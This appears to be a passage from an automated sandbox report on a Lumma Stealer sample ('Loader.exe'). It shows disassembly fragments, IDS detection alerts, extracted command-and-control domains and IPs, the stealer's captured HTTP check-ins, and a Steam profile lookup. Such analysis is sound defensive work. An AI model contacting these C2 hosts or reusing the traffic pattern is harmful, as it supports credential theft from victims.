Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	3_2_0042B500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h	3_2_0042B500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00429500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]	3_2_0042D530
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h	3_2_004405F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	3_2_004455B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_004455B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0041E670
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	3_2_004056F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	3_2_00440750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, ecx	3_2_00410772
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	3_2_00445700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_00445700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	3_2_0042E7C2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004207E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	3_2_004457F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_004457F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	3_2_0040F819
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, ebx	3_2_0040F819
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+14h]	3_2_0040D8C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]	3_2_0040D8C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]	3_2_0042B8F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_004398F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	3_2_004108A8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0042F900
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push esi	3_2_0042C913
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	3_2_00432992
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	3_2_00432992
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h	3_2_00421A60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h	3_2_00440AA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	3_2_00445B20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_00445B20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp dword ptr [0044EF6Ch]	3_2_0042CBDC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_00406B90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	3_2_0042CC28
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h	3_2_00446C30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]	3_2_00440CC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh	3_2_00440CC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then lea eax, dword ptr [esp+48h]	3_2_0042AD00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_00445E70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	3_2_0043EE00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh	3_2_0041EE2E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	3_2_0041EE2E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	3_2_0041EE2E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh	3_2_00446F00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	3_2_00446F00

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (widdensmoywi .sbs) : 192.168.2.6:55988 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.6:50381 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.6:53786 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.6:50222 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.6:64493 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056573 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (widdensmoywi .sbs in TLS SNI) : 192.168.2.6:49710 -> 104.21.8.37:443
Source: Network traffic	Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.6:49715 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.6:63149 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.6:51843 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.6:58354 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.6:49718 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.6:49732 -> 104.21.79.35:443
Source: Network traffic	Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.6:50135 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.6:49721 -> 172.67.173.224:443
Source: Network traffic	Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.6:49720 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.6:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.8.37:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.8.37:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49715 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49720 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49720 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49718 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49721 -> 172.67.173.224:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49721 -> 172.67.173.224:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49744 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49755 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49755 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49761 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49732 -> 104.21.79.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49732 -> 104.21.79.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49761 -> 172.67.206.204:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: drawwyobstacw.sbs
Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: vennurviot.sbs
Source: Malware configuration extractor	URLs: mathcucom.sbs
Source: Malware configuration extractor	URLs: widdensmoywi.sbs

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: widdensmoywi.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=P9r_mXsInYaSCDFf.Rj_aAUYNGZ0HMdPID1gWzVfqGI-1728765372-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: widdensmoywi.sbs
Source: global traffic	DNS traffic detected: DNS query: mathcucom.sbs
Source: global traffic	DNS traffic detected: DNS query: allocatinow.sbs
Source: global traffic	DNS traffic detected: DNS query: enlargkiw.sbs
Source: global traffic	DNS traffic detected: DNS query: resinedyw.sbs
Source: global traffic	DNS traffic detected: DNS query: vennurviot.sbs
Source: global traffic	DNS traffic detected: DNS query: ehticsprocw.sbs
Source: global traffic	DNS traffic detected: DNS query: condifendteu.sbs
Source: global traffic	DNS traffic detected: DNS query: drawwyobstacw.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: widdensmoywi.sbs

Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/
Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/api
Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/apis
Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/piP
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
